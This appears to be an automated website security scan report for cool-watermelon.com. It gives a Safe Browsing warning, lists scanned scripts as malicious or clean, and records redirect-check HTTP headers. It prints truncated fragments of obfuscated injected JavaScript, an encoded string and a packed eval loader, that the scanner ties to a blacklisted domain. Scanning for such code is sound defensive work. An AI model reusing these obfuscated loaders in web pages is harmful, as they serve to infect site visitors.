Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cool-watermelon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cool-watermelon.com/ | 200 OK Content-Length: 32262 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: shop-corp24.com var _10O='=oQKpkyJ8dCK0lGbwNnLngXZk5Wa8pnQzwnMk92afNna4IDfoRHZpdHf0h2ZpVGa8hHcwgTM3IDfxE0M8RWS5JEduVWblxWR0V2Z8RjMwJ3bjxXZwF2YzVmb1xHcvRnQzwHZhVGa8VWbh50ZhRVeCNHduVWblxWR0V2Z852bpRXaz9Gc3IDfyVmcyVmZlJHfsJXd8hHcwAjM3IDflRXdilmc0RXQ0V2c8VGdpJ3d8RnZlxmQzwXawFWeyVWdxpGfu9Wa0Nmb1ZWQww3YyNHdldGfr9GfnFGV2lGZ4IDfvZmbpxnZlJHflNHbhZGMywXbvNGfklGfnFGV2lGZBBDf2lGZ3IDf0BXayN2cDNDfmlWRzwHduVWb1N2bkR0M8RWYvxmbvdjM8VGd1x2bzJWYBNDfnFGV2lGZwIDf05WZ2VEajFGd0FGf39GZul2d4I ...[4099 bytes skipped]... Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\ ...[16225 bytes skipped]... | ||
http://golax.net/wp-content/themes/tasty-showcase/j/karma-0.2.js | 200 OK Content-Length: 97657 Content-Type: application/x-javascript | clean |
http://golax.net/wp-content/themes/tasty-showcase/j/karmic-flow-0.2.js | 200 OK Content-Length: 8391 Content-Type: application/x-javascript | clean |
http://golax.net/wp-content/themes/tasty-showcase/j/iepngfix_tilebg.js | 200 OK Content-Length: 4345 Content-Type: application/x-javascript | clean |
http://golax.net/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/x-javascript | clean |
http://golax.net/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 78620 Content-Type: application/x-javascript | clean |
http://golax.net/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/x-javascript | clean |
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 291 Content-Type: text/html | clean |
http://lite.piclens.com/test404page.js | 200 OK Content-Length: 291 Content-Type: text/html | clean |
http://canexback.com/stats.js | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cool-watermelon.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 20 Jan 2015 07:25:24 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=41fcd513975648f3082adb0622e02f12; path=/
X-Powered-By: PHP/5.1.4
X-Powered-By: ASP.NET
GET / HTTP/1.1
Host: cool-watermelon.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 20 Jan 2015 07:25:24 GMT
Pragma: no-cache
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=41fcd513975648f3082adb0622e02f12; path=/
X-Powered-By: PHP/5.1.4
X-Powered-By: ASP.NET
Second query (visit from search engine):
GET / HTTP/1.1
Host: cool-watermelon.com
Referer: http://www.google.com/search?q=cool-watermelon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cool-watermelon.com
Referer: http://www.google.com/search?q=cool-watermelon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.